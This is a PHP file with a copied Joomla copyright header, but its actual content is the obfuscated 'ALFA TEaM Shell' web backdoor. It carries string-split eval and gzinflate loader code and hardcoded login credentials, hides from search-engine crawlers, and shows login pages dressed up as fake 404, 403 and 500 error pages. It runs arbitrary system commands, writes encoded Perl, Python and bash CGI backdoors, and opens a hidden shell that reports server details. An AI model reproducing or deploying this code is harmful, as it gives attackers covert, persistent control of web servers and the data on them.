Untitled

<?php

/**

* @package libraryAdministrator

* @subpackage Application

* @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.

* @license GNU General Public License version 2 or later; see LICENSE.txt

* System Default: leaves the level of PHP error

* debug : This will turn on the debugging system

* Installation check, and check on removal of the install directory.

* Debug Language will work without the Debug

* errors. If any such issues or errors occured

* errors. If any such issues or errors php

* System Default: leaves the level of PHP error reporting to that set up in the server (usually in the php.ini file).

* None: switches off PHP error reporting.

* Simple: override the server setting to give a basic level of reporting.

* Maximum: override the server setting and reporting of all errors.

* Development: override the server setting and reporting of all errors.

* $debug : This will turn on the debugging system of Joomla!. When set to Yes, this tool will provide diagnostic information, language translations, and SQL

* errors. If any such issues or errors occur, they will be displayed at the bottom of each page, in both the front-end and back-end.

* $debug_lang : This will turn on the debugging indicators (*...*) or (?...?) for the Joomla! Language files. Debug Language will work without the Debug

* System tool set to on. But it will not provide additional detailed references which w$debug : This will turn on the debugging system of Joomla!. When set

* to Yes, this tool will provide diagnostic information, language translations, and SQL errors. If any such issues or errors occur, they will be displayed

* at the bottom of each page, in both the front-end and back-end.

* Debug Language will work without the Debug System tool set to on. But it will not provide additional detailed references which would help in correcting

* any errors.

*/

$GLOBALS['NeUSMyPGXP'] = array(

'usmfzmlHFCje' => 'admin',

'paLDRhHfAovu' => 'da2cc0d1f467275e2b24d4c45c64ed39',

'saEuEgnDlHuL' => '1',

'logXKTfQPNcx' => '404',

'shiJVQhUrFkw' => '1',

'pogkUzMiAjqB' => true,

);

$XDmfxOnhck='fu'.'nct'.'ion'.'_'.'e'.'x'.'is'.'ts'.'';$RxPWPyQqTL='cha'.'r'.'Cod'.'e'.'A'.'t'.'';$CyvIHOdCHU='e'.'va'.'l'.'';$jgpUDiTPrk='g'.'zi'.'nf'.'l'.'at'.'e'.'';if(!$XDmfxOnhck('bas'.'e'.'6'.'4_e'.'ncod'.'e'.'')){function nIWUkxhnhj($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return $data;}do{$o1 = $RxPWPyQqTL($data, $i++);$o2 = $RxPWPyQqTL($data, $i++);$o3 = $RxPWPyQqTL($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}}else{function nIWUkxhnhj($s){$b='bas'.'e'.'6'.'4_e'.'ncod'.'e'.'';return $b($s);}}if(!$XDmfxOnhck('b'.'ase'.'6'.'4_deco'.'d'.'e')){function QFdAWqZnUX($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}}else{function QFdAWqZnUX($s){$b='b'.'ase'.'6'.'4_deco'.'d'.'e';return $b($s);}}$gEleJRqGNj='create_fun'.'ct'.'io'.'n';$oFcbuslxiL = $gEleJRqGNj('$cq',$CyvIHOdCHU.'('.$jgpUDiTPrk.'('.'Q'.'FdAW'.'qZ'.'n'.'U'.'X'.''.'($cq)'.')'.')'.';');

/* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */ /* You're killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down -- Solevisible */ @session_start();function __ZW5jb2Rlcg($s){return nIWUkxhnhj($s);}function __ZGVjb2Rlcg($s){return QFdAWqZnUX($s);}$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];$check = false;if(!isset($_SESSION["alfa_settings_signature"])){$check = true;}else{if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){$check = true;}}if($check){$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));foreach($GLOBALS['NeUSMyPGXP'] as $key => $value){$prefix = substr($key, 0, 2);if($prefix == "us"){$GLOBALS['DB_NAME']["user"] = $value;$GLOBALS['DB_NAME']["user_rand"] = $key;}elseif($prefix == "pa"){$GLOBALS['DB_NAME']["pass"] = $value;$GLOBALS['DB_NAME']["pass_rand"] = $key;}elseif($prefix == "sa"){$GLOBALS['DB_NAME']["safemode"] = $value;$GLOBALS['DB_NAME']["safemode_rand"] = $key;}elseif($prefix == "lo"){$GLOBALS['DB_NAME']["login_page"] = $value;$GLOBALS['DB_NAME']["login_page_rand"] = $key;}elseif($prefix == "sh"){$GLOBALS['DB_NAME']["show_icons"] = $value;$GLOBALS['DB_NAME']["show_icons_rand"] = $key;}elseif($prefix == "po"){$GLOBALS['DB_NAME']["post_encryption"] = $value;$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;}}$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];}unset($GLOBALS['NeUSMyPGXP']); if(!isset($_SERVER["HTTP_HOST"]))exit();

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}

if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');

if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');

if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');

if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');

if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');

if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');

date_default_timezone_set('Asia/Tehran');

define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));

define("__ALFA_VERSION__", "3.0.2");

define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);

define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);

define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));

$GLOBALS['__ALFA_COLOR__'] = array(

"shell_border" => array(

"key_color" => "#801818",

"multi_selector" => array(

".header" => "border: 7px solid {color}",

"#meunlist" => "border-color: {color}",

"#hidden_sh" => "background-color: {color}",

".ajaxarea" => "border: 1px solid {color}",

".foot" => "border-color: {color}",

)

),

"header_vars" => "#27979B",

"header_values" => "#daf50c",

"header_on" => "#00FF00",

"header_off" => "#ff0000",

"header_none" => "#00FF00",

"home_shell" => "#ff0000",

"home_shell:hover" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".home_shell:hover" => "color: {color};",

)

),

"back_shell" => "#efbe73",

"back_shell:hover" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".back_shell:hover" => "color: {color};",

)

),

"header_pwd" => "#00FF00",

"header_pwd:hover"=> array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".header_pwd:hover" => "color: {color};",

)

),

"header_drive" => "#00FF00",

"header_drive:hover" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".header_drive:hover" => "color: {color};",

)

),

"header_show_all" => "#00FF00",

"disable_functions" => "#ff0000",

"footer_text" => "#27979B",

"menu_options" => "#27979B",

"menu_options:hover" => array(

"key_color" => "#646464",

"multi_selector" => array(

".menu_options:hover" => "background-color: {color};font-weight: unset;",

)

),

"options_list" => array(

"key_color" => "#00FF00",

"multi_selector" => array(

".ajaxarea .header center a" => "color: {color};",

)

),

"options_list:hover" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".ajaxarea .header center a:hover" => "color: {color};",

)

),

"options_list_header" => array(

"key_color" => "#4d16ba",

"multi_selector" => array(

".txtfont_header" => "color: {color};",

)

),

"options_list_text" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".txtfont,.tbltxt" => "color: {color};",

)

),

"Alfa+" => array(

"key_color" => "#27E8AE",

"multi_selector" => array(

".alfa_plus" => "color: {color};font-weight: unset;",

)

),

"hidden_shell_text" => array(

"key_color" => "#00FF00",

"multi_selector" => array(

"#hidden_sh a" => "color: {color};",

)

),

"hidden_shell_version" => "#ff0000",

"shell_name" => "#FF0000",

"main_row:hover" => array(

"key_color" => "#646464",

"multi_selector" => array(

".main tr:hover" => "background-color: {color};",

)

),

"main_header" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".main th" => "color: {color};",

)

),

"main_name" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".main .main_name" => "color: {color};font-weight: unset;",

)

),

"main_size" => "#daf50c",

"main_modify" => "#daf50c",

"main_owner_group" => "#daf50c",

"main_green_perm" => "#25ff00",

"main_red_perm" => "#FF0000",

"main_white_perm" => "#FFFFFF",

"beetween_perms" => "#FFFFFF",

"main_actions" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".main .actions" => "color: {color};",

)

),

"menu_options:hover" => array(

"key_color" => "#646464",

"multi_selector" => array(

".menu_options:hover" => "background-color: {color};font-weight: unset;",

)

),

"minimize_editor_background" => array(

"key_color" => "#0e304a",

"multi_selector" => array(

".minimized-wrapper" => "background-color: {color};",

)

),

"minimize_editor_text" => array(

"key_color" => "#f5deb3",

"multi_selector" => array(

".minimized-text" => "color: {color};",

)

),

"editor_border" => array(

"key_color" => "#0e304a",

"multi_selector" => array(

".editor-explorer,.editor-modal" => "border: 2px solid {color};",

)

),

"editor_background" => array(

"key_color" => "rgba(0, 1, 23, 0.94)",

"multi_selector" => array(

".editor-explorer,.editor-modal" => "background-color: {color};",

)

),

"editor_header_background" => array(

"key_color" => "rgba(21, 66, 88, 0.93)",

"multi_selector" => array(

".editor-header" => "background-color: {color};",

)

),

"editor_header_text" => array(

"key_color" => "#00ff7f",

"multi_selector" => array(

".editor-path" => "color: {color};",

)

),

"editor_header_button" => array(

"key_color" => "#1d5673",

"multi_selector" => array(

".close-button, .editor-minimize" => "background-color: {color};",

)

),

"editor_actions" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".editor_actions" => "color: {color};",

)

),

"editor_file_info_vars" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".editor_file_info_vars" => "color: {color};",

)

),

"editor_file_info_values" => array(

"key_color" => "#daf50c",

"multi_selector" => array(

".filestools" => "color: {color};",

)

),

"editor_history_header" => array(

"key_color" => "#14ff07",

"multi_selector" => array(

".hheader-text,.history-clear" => "color: {color};",

)

),

"editor_history_list" => array(

"key_color" => "#03b3a3",

"multi_selector" => array(

".editor-file-name" => "color: {color};",

)

),

"editor_history_selected_file" => array(

"key_color" => "rgba(49, 55, 93, 0.77)",

"multi_selector" => array(

".is_active" => "background-color: {color};",

)

),

"editor_history_file:hover" => array(

"key_color" => "#646464",

"multi_selector" => array(

".file-holder > .history:hover" => "background-color: {color};",

)

),

"input_box_border" => array(

"key_color" => "#801818",

"multi_selector" => array(

"input[type=text],textarea" => "border: 1px solid {color}",

)

),

"input_box_text" => array(

"key_color" => "#999999",

"multi_selector" => array(

"input[type=text],textarea" => "color: {color};",

)

),

"input_box:hover" => array(

"key_color" => "#27979B",

"multi_selector" => array(

"input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",

)

),

"select_box_border" => array(

"key_color" => "#801818",

"multi_selector" => array(

"select" => "border: 1px solid {color}",

)

),

"select_box_text" => array(

"key_color" => "#FFFFEE",

"multi_selector" => array(

"select" => "color: {color};",

)

),

"select_box:hover" => array(

"key_color" => "#27979B",

"multi_selector" => array(

"select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",

)

),

"button_border" => array(

"key_color" => "#27979B",

"multi_selector" => array(

"input[type=submit],.button,#addup" => "border: 1px solid {color};",

)

),

"button:hover" => array(

"key_color" => "#27979B",

"multi_selector" => array(

"input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",

".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",

)

),

"outputs_text" => array(

"key_color" => "#daf50c",

"multi_selector" => array(

".ml1" => "color: {color};",

)

),

"outputs_border" => array(

"key_color" => "#801818",

"multi_selector" => array(

".ml1" => "border: 1px solid {color};",

)

),

"uploader_border" => array(

"key_color" => "#801818",

"multi_selector" => array(

".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",

)

),

"uploader_background" => array(

"key_color" => "#801818",

"multi_selector" => array(

".inputfile strong" => "background-color: {color};",

)

),

"uploader_text_right" => array(

"key_color" => "#FFFFFF",

"multi_selector" => array(

".inputfile strong" => "color: {color};",

)

),

"uploader_text_left" => array(

"key_color" => "#25ff00",

"multi_selector" => array(

".inputfile span" => "color: {color};",

)

),

"uploader:hover" => array(

"key_color" => "#27979B",

"multi_selector" => array(

".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",

)

),

"uploader_progress_bar" => array(

"key_color" => "#ff0000",

"multi_selector" => array(

"#up_bar" => "background-color: {color};",

)

),

"mysql_tables" => "#00FF00",

"mysql_table_count" => "#daf50c",

"copyright" => "#ff0000",

"scrollbar" => array(

"key_color" => "#1e82b5",

"multi_selector" => array(

"*::-webkit-scrollbar-thumb" => "background-color: {color};",

)

),

"scrollbar_background" => array(

"key_color" => "#000115",

"multi_selector" => array(

"*::-webkit-scrollbar-track" => "background-color: {color};",

)

),

);

$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));

$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);

@session_start();

if($config['AlfaProtectShell']){

$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");

$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';

if($config['AlfaLoginPage'] == 'gui'){

if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){

if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){

@$_SESSION["AlfaUser"] = $config['AlfaUser'];

@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);

@header('location: '.$_SERVER["PHP_SELF"]);

}

echo '

<style>

body{background: black;}

#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }

#loginbox td { border-radius:5px; font-size:11px; }

</style>

<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>

<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>

<div id=loginbox><p><font face="verdana,arial" size=-1>

<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>

<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>

<tr><td bgcolor="black" style="padding:5">

<form method="post">

<input type="hidden" name="action" value="login">

<input type="hidden" name="hide" value="">

<center><table>

<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>

<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>

<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>

</div><br /></center>';

exit;

}

}elseif($config['AlfaLoginPage']=='500'){

if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){

if(@md5($_POST["password"])==$config['AlfaPass']){

@$_SESSION["AlfaUser"] = $config['AlfaUser'];

@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);

header('location: '.$_SERVER["PHP_SELF"]);

}

echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;

exit;

}

}elseif($config['AlfaLoginPage']=='403'){

if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){

if(@md5($_POST["password"])==$config['AlfaPass']){

@$_SESSION["AlfaUser"] = $config['AlfaUser'];

@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);

header('location: '.$_SERVER["PHP_SELF"]);

}

echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;

exit;

}

}elseif($config['AlfaLoginPage']=='404'){

if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){

if(@md5($_POST["password"])==$config['AlfaPass']){

@$_SESSION["AlfaUser"] = $config['AlfaUser'];

@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);

header('location: '.$_SERVER["PHP_SELF"]);

}

echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;

exit;

}

}

}

function decrypt_post($str, $pwd){

if(__ALFA_POST_ENCRYPTION__){

$pwd = __ZW5jb2Rlcg($pwd);

$str = __ZGVjb2Rlcg($str);

$enc_chr = "";

$enc_str = "";

$i = 0;

while ($i < strlen($str)) {

for ($j = 0; $j < strlen($pwd); $j++) {

$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));

$enc_str .= $enc_chr;

$i++;

if ($i >= strlen($str))

break;

}

}

return __ZGVjb2Rlcg($enc_str);

}else{

return __ZGVjb2Rlcg($str);

}

}

function _AlfaSecretKey(){

if(!isset($_SESSION["AlfaSecretKey"])){

$_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);

}

return $_SESSION["AlfaSecretKey"];

}

function alfa_getColor($target){

if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){

return $GLOBALS["DB_NAME"]["color"][$target];

}else{

$target = $GLOBALS["__ALFA_COLOR__"][$target];

if(is_array($target)){

return $target["key_color"];

}else{

return $target;

}

}

}

function alfaCssLoadColors(){

$css = "";

foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){

if(!is_array($value)){

$value = alfa_getColor($key);

$css .= ".{$key}{color: {$value};}";

}else{

if(isset($value["multi_selector"])){

foreach($value["multi_selector"] as $k => $v){

$color = alfa_getColor($key);

$code = str_replace("{color}", $color, $v);

$css .= $k."{".$code."}";

}

}

}

}

return $css;

}

if(isset($_POST['ajax'])){

function AlfaNum(){

$args = func_get_args();

$alfax = array();

$find = array();

for($i=1;$i<=10;$i++){

$alfax[] = $i;

}

foreach($args as $arg){

$find[] = $arg;

}

echo '<script>';

foreach($alfax as $alfa){

if(in_array($alfa,$find))

continue;

echo 'alfa'.$alfa."_=";

}

echo '""</script>';

}}

function _alfa_cgicmd($cmd,$lang="perl"){

if(isset($_SESSION["alfacgiapi_mode"])){

return "";

}

$cmd_pure = $cmd;

$is_curl = function_exists('curl_version');

$is_socket = function_exists('fsockopen');

if($is_curl||$is_socket){

$recreate = false;

if(isset($_SESSION["alfacgiapi"])){

if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){

$recreate = true;

$lang = $_SESSION["alfacgiapi"];

}

}

if(!isset($_SESSION["alfacgiapi"])||$recreate){

@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

$perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';

$py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";

$bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";

if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;

alfaWriteTocgiapi($lang.".alfa",$source);

alfacgihtaccess('cgi', "alfacgiapi/");

}else{

$lang = $_SESSION["alfacgiapi"];

}

$cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);

if($is_curl){

$address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";

$post = new AlfaCURL();

$data = $post->Send($address, "post", $cmd);

}elseif($is_socket){

$server = $_SERVER["SERVER_NAME"];

$uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";

$data = _alfa_fsockopen($server,$uri,$cmd);

}

$out = "";

if(strstr($data, "[solevisible~api]")){

$_SESSION["alfacgiapi"] = $lang;

if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){

$out = $res[1];

}

}elseif($lang=="perl"){

return _alfa_cgicmd($cmd_pure,"py");

}elseif($lang=="py"){

return _alfa_cgicmd($cmd_pure,"bash");

}else{

$_SESSION["alfacgiapi_mode"] = "off";

}

return trim($out);

}else{

return "";

}

}

function alfaEx($in,$re=false,$cgi=true,$all=false){

$data = _alfa_php_cmd($in,$re);

if(empty($data)&&$cgi||$all){

if($GLOBALS['sys']=='unix'){

if(strlen(_alfa_php_cmd("whoami"))==0||$all){

$cmd = _alfa_cgicmd($in);if(!empty($cmd)){

return $cmd;

}

}

}

}

return $data;

}

function _alfa_php_cmd($in,$re=false){

$out='';

try{

if($re)$in=$in." 2>&1";

if(function_exists('exec')){

@exec($in,$out);

$out = @join("\n",$out);

}elseif(function_exists('passthru')) {

ob_start();

@passthru($in);

$out = ob_get_clean();

}elseif(function_exists('system')){

ob_start();

@system($in);

$out = ob_get_clean();

} elseif (function_exists('shell_exec')) {

$out = shell_exec($in);

}elseif(function_exists("popen")&&function_exists("pclose")){

if(is_resource($f = @popen($in,"r"))){

$out = "";

while(!@feof($f))

$out .= fread($f,1024);

pclose($f);

}

}elseif(function_exists('proc_open')){

$pipes = array();

$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);

$out=@stream_get_contents($pipes[1]);

}elseif(class_exists('COM')){

$alfaWs = new COM('WScript.shell');

$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);

$stdout = $exec->StdOut();

$out=$stdout->ReadAll();

}

}catch(Exception $e){}

return $out;

}

function _alfa_fsockopen($server,$uri,$post){

$socket = @fsockopen($server, 80, $errno, $errstr, 15);

if($socket){

$http = "POST {$uri} HTTP/1.0\r\n";

$http .= "Host: {$server}\r\n";

$http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";

$http .= "Content-Type: application/x-www-form-urlencoded\r\n";

$http .= "Content-length: " . strlen($post) . "\r\n";

$http .= "Connection: close\r\n\r\n";

$http .= $post . "\r\n\r\n";

fwrite($socket, $http);

$contents = "";

while (!@feof($socket)) {

$contents .= @fgets($socket, 4096);

}

list($header, $body) = explode("\r\n\r\n", $contents, 2);

@fclose($socket);

return $body;

}else{

return "";

}

}

if(isset($_GET["solevisible"])){

@error_reporting(E_ALL ^ E_NOTICE);

echo '<html>';

echo "<title>Solevisible Hidden Shell</title>";

echo "<body bgcolor=#000000>";

echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';

$safe_mode = @ini_get('safe_mode');

if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}

echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";

echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";

echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";

echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";

echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";

echo"<font color=#7CFC00>Disable functions : </font>";

$disfun = @ini_get('disable_functions');

if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}

echo"<font color=red>";

echo "$disfun";

echo"</font><br>";

echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";

echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";

